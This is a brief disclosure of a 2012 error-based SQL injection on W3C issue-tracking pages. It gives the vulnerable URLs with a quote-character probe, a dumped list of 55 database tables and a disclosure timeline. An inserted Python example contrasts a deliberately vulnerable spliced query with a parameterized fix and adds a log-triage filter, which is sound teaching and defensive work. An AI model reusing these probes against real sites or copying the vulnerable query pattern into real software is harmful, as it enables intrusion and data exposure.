W3C SQL Injection (10/2012)
W3C.org was vulnerable to error based SQL injection:
http://www.w3.org/WAI/GL/WCAG20/issue-tracking/viewdata_individual.php?id=1
http://www.w3.org/WAI/GL/WCAG20/issue-tracking/resolutions/no_response_results.php?frum=%22
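The pattern behind the report above, as an added example that is not W3C's code: a query built by splicing a request parameter into SQL text (so a lone quote becomes a database syntax error), the parameterized form that removes the problem, and a small access-log check for requests carrying quote characters or ending in a server error. The table, rows, log lines and the 500 status are all constructed here; only the `frum` parameter name is taken from the URL above. SQLite is used as a stand-in for the site's database, with single quotes as the string delimiter, so the probe value is `'` rather than the `"` shown in the URL.

```python
"""Added example, not W3C's code: the unsafe query-building pattern behind an
error-based SQL injection, the parameterized form that removes it, and a small
log check a defender can run for requests carrying quote characters.

Schema, rows and log lines are constructed for illustration; the `frum`
parameter name is borrowed from the report's URL, nothing else is.
"""
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for an issue tracker."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE issues (id INTEGER PRIMARY KEY, forum TEXT, title TEXT)")
    conn.executemany(
        "INSERT INTO issues (forum, title) VALUES (?, ?)",
        [("wcag20", "Contrast ratio wording"),
         ("wcag20", "Timing adjustable"),
         ("uaag", "Keyboard access")],
    )
    return conn


def lookup_unsafe(conn: sqlite3.Connection, frum: str) -> list:
    """Vulnerable: the request value is spliced into the SQL text, so a quote
    in it is parsed as SQL and the database raises a syntax error."""
    sql = "SELECT title FROM issues WHERE forum = '%s' ORDER BY id" % frum
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, frum: str) -> list:
    """Hardened: the value is bound as a parameter and never parsed as SQL."""
    rows = conn.execute("SELECT title FROM issues WHERE forum = ? ORDER BY id", (frum,))
    return [row[0] for row in rows]


def probe(fn, conn: sqlite3.Connection, value: str) -> tuple:
    """Run a lookup and report ('ok', rows) or ('error', exception name).
    The raw database message is deliberately not returned: echoing it to the
    client is what makes an injection 'error based'."""
    try:
        return ("ok", fn(conn, value))
    except sqlite3.Error as exc:
        return ("error", type(exc).__name__)


# Constructed access-log lines (Apache common log format). The 500 status is an
# assumption about how an unhandled database error would surface in the log.
LOG_LINES = [
    '203.0.113.5 - - [15/Oct/2012:10:01:02 +0000] "GET /WAI/GL/WCAG20/issue-tracking/viewdata_individual.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [15/Oct/2012:10:01:09 +0000] "GET /WAI/GL/WCAG20/issue-tracking/resolutions/no_response_results.php?frum=%22 HTTP/1.1" 500 233',
    '198.51.100.7 - - [15/Oct/2012:10:02:44 +0000] "GET /WAI/GL/WCAG20/issue-tracking/viewdata_individual.php?id=12 HTTP/1.1" 200 498',
]

_REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def flag_requests(lines) -> list:
    """Return (ip, path, reason) for requests whose query values carry a quote
    character after URL-decoding, or that ended in a 5xx response."""
    flagged = []
    for line in lines:
        m = _REQ.match(line)
        if not m:
            continue
        ip, _method, target, status = m.groups()
        parts = urlsplit(target)
        params = parse_qs(parts.query, keep_blank_values=True)
        reasons = []
        if any(("'" in v or '"' in v) for vals in params.values() for v in vals):
            reasons.append("quote in query value")
        if status.startswith("5"):
            reasons.append("server error")
        if reasons:
            flagged.append((ip, parts.path, "; ".join(reasons)))
    return flagged


if __name__ == "__main__":
    db = make_db()
    print(probe(lookup_unsafe, db, "'"))   # ('error', 'OperationalError')
    print(probe(lookup_safe, db, "'"))     # ('ok', [])
    for hit in flag_requests(LOG_LINES):
        print(hit)
```

The two lookups differ only in whether the value reaches the database as SQL text or as a bound parameter; the hardened one returns an empty result for the quote rather than an error. The log check is a coarse triage filter: a quote in a decoded query value paired with a 5xx response is the signature worth pulling out of a web log when investigating a report like this one.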
select table_name from information_schema.tables [55]:
[*] AC200011FollowUp
[*] acmfastsurvey
[*] ACSurvey200210
[*] CHARACTER_SETS
[*] COLLATION_CHARACTER_SET_APPLICABILITY
[*] COLLATIONS
[*] COLUMN_PRIVILEGES
[*] COLUMNS
[*] commentsTracker
[*] cookies
[*] dog
[*] ENGINES
[*] EVENTS
[*] FILES
[*] GLOBAL_STATUS
[*] GLOBAL_VARIABLES
[*] human
[*] KEY_COLUMN_USAGE
[*] messages
[*] PARTITIONS
[*] PLUGINS
[*] PROCESSLIST
[*] PROFILING
[*] prospective_members
[*] REFERENTIAL_CONSTRAINTS
[*] resource
[*] resources
[*] reviewedSpecifications
[*] ROUTINES
[*] SCHEMA_PRIVILEGES
[*] SCHEMATA
[*] SESSION_STATUS
[*] SESSION_VARIABLES
[*] specSections
[*] STATISTICS
[*] TABLE_CONSTRAINTS
[*] TABLE_PRIVILEGES
[*] TABLES
[*] testac
[*] testad
[*] testae
[*] toy
[*] toy2
[*] toy3
[*] TRIGGERS
[*] triples
[*] trrdf_id2val
[*] trrdf_store_var
[*] trrdf_triple
[*] trrdf_triple_dup
[*] uri
[*] USER_PRIVILEGES
[*] VIEWS
[*] wgOptions
[*] xpointerRegistry
Timeline:
15/10/2012 Initial Report
15/10/2012 Acknowledged by W3C
26/10/2012 Bugs still unfixed, asked again for status
27/10/2012 Got Feedback from W3C:
"Thanks very much for bringing this to our attention, and for
following up. Many of my colleagues are traveling this week but I
expect we will be able to get these fixed sometime within the
next few days."
Didn't know when exactly they fixed these issues.